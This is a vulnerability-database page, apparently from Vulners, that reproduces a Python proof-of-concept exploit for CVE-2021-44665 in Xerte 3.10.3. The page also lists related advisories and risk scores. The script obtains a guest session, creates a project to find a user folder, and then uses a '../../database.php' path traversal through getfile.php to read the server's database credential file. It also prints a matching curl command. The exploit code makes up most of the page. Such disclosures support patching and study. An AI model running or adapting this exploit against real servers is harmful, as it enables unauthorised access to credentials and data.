Lucene search
K

Xerte 3.10.3 - Directory Traversal (Authenticated) Exploit

šŸ—“ļøĀ 02 Mar 2022Ā 00:00:00Reported byĀ Rik LutzTypeĀ 
zdt
Ā zdt
šŸ”—Ā 0day.todayšŸ‘Ā 286Ā Views

Xerte 3.10.3 - Directory Traversal (Authenticated) Exploit, allows an authenticated user to retrieve sensitive system files

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-44665
24 Feb 202221:15
–attackerkb
Circl
CVE-2021-44665
25 Feb 202200:20
–circl
CNNVD
Xerte č·Æå¾„éåŽ†ę¼ę“ž
24 Feb 202200:00
–cnnvd
CNVD
Xerte path traversal vulnerability
25 Feb 202200:00
–cnvd
CVE
CVE-2021-44665
24 Feb 202220:16
–cve
Cvelist
CVE-2021-44665
24 Feb 202220:16
–cvelist
Exploit DB
Xerte 3.10.3 - Directory Traversal (Authenticated)
2 Mar 202200:00
–exploitdb
EUVD
EUVD-2021-31485
3 Oct 202520:07
–euvd
NVD
CVE-2021-44665
24 Feb 202221:15
–nvd
Packet Storm
Xerte 3.10.3 Directory Traversal
2 Mar 202200:00
–packetstorm
Rows per page
# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip
# Version: up until 3.10.3
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44665

# This PoC assumes guest login is enabled. Vulnerable url:
# https://<host>/getfile.php?file=<user-direcotry>/../../database.php
# You can find a userfiles-directory by creating a project and browsing the media menu.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download
# The userfiles-direcotry will be noted in the URL and/or when you download a file.
# They look like: <numbers>-<username>-<templatename>

import requests
import re

xerte_base_url = "http://127.0.0.1"
file_to_grab = "/../../database.php"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.

with requests.Session() as session:
    # Get a PHP session ID
    if not php_session_id:
        session.get(xerte_base_url) 
    else:
        session.cookies.set("PHPSESSID", php_session_id)

    # Use a default template
    data = {
        'tutorialid': 'Nottingham',
        'templatename': 'Nottingham',
        'tutorialname': 'exploit',
        'folder_id': ''
    }

    # Create a new project in order to create a user-folder
    template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)

    # Find template ID
    data = {
        'template_id': re.findall('(\d+)', template_id.text)[0]
    }

    # Find the created user-direcotry:
    user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
    user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]

    # Grab file
    result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
    print(result.text)
    print("|-- Used Variables: --|")
    print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID'])
    print("user direcotry: " + user_direcotry)
    print("Curl example:")
    print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Mar 2022 00:00Current
0.2Low risk
Vulners AI Score0.2
CVSS 23.5
CVSS 3.16.5
EPSS0.07685
286